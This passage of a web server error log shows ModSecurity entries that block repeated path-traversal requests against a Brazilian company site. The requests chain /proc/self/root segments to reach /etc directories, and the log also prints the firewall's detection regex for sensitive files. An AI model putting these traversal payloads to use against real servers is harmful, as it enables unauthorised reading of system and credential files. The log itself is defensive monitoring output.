"PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhCq7ABkC4fWIHEf8H6vgAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:49:40.093803 2026] [:error] [pid 21805:tid 140411666392832] [client 74.7.241.46:56702] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhCtLABkC4fWIHEf8H6ywAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:49:47.961566 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.241.46:36138] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhCu9SswJuvopo3lOhpzQAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:50:07.624062 2026] [:error] [pid 15568:tid 140411725141760] [client 74.7.241.46:35206] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhCz6QpVkWug9HeOt9BbAAAA0I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:50:09.015297 2026] [:error] [pid 10772:tid 140411641214720] [client 74.7.241.46:44546] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhC0f9ocpUE4ed4uDz61gAAAgw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:50:10.362888 2026] [:error] [pid 21806:tid 140411582465792] [client 74.7.241.46:44562] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhC0tSswJuvopo3lOhp1QAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:50:12.910911 2026] [:error] [pid 21533:tid 140411666392832] [client 74.7.241.46:44568] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhC1HjZBu2q05ozVU9lcgAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:50:15.360976 2026] [:error] [pid 15061:tid 140411616036608] [client 74.7.243.203:60988] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhC16TCbgAP5jq5Teg3tgAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:50:15.466372 2026] [:error] [pid 10831:tid 140411557287680] [client 74.7.241.46:44576] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhC146lpbStxTqkSkt2_gAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:50:16.774264 2026] [:error] [pid 10772:tid 140411632822016] [client 74.7.241.46:44588] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhC2P9ocpUE4ed4uDz62AAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:50:19.098746 2026] [:error] [pid 10772:tid 140411548894976] [client 74.7.241.46:44600] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhC2_9ocpUE4ed4uDz63AAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:50:21.631104 2026] [:error] [pid 15568:tid 140411699963648] [client 74.7.241.46:36406] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhC3aQpVkWug9HeOt9BdQAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:50:24.894849 2026] [:error] [pid 21806:tid 140411548894976] [client 74.7.241.46:36412] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhC4NSswJuvopo3lOhp2gAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:50:26.252325 2026] [:error] [pid 15568:tid 140411557287680] [client 74.7.241.46:36422] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhC4qQpVkWug9HeOt9BdwAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:50:30.799534 2026] [:error] [pid 10831:tid 140411590858496] [client 74.7.241.46:36436] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhC5o6lpbStxTqkSkt3DAAAAlI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:50:34.689087 2026] [:error] [pid 21805:tid 140411708356352] [client 74.7.241.46:57880] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhC6rABkC4fWIHEf8H66QAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:50:35.953240 2026] [:error] [pid 11972:tid 140411540502272] [client 74.7.241.46:57882] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhC65qj1wV0Si-Okef6SgAAABg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:50:38.393474 2026] [:error] [pid 10651:tid 140411733534464] [client 74.7.241.46:57894] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhC7rysWC90G-1nBrBPqAAAAYE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:50:39.763610 2026] [:error] [pid 21533:tid 140411658000128] [client 74.7.243.203:50280] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhC73jZBu2q05ozVU9liQAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:50:41.150689 2026] [:error] [pid 10651:tid 140411716749056] [client 74.7.243.203:57764] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhC8bysWC90G-1nBrBPqwAAAYM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:50:42.515537 2026] [:error] [pid 14895:tid 140411699963648] [client 74.7.243.203:57772] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhC8lajLEzk2WiQ-10dRAAAAoU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:50:43.058514 2026] [:error] [pid 15568:tid 140411548894976] [client 74.7.241.46:51420] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhC86QpVkWug9HeOt9BfQAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:50:43.784364 2026] [:error] [pid 10772:tid 140411666392832] [client 74.7.243.203:57776] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id 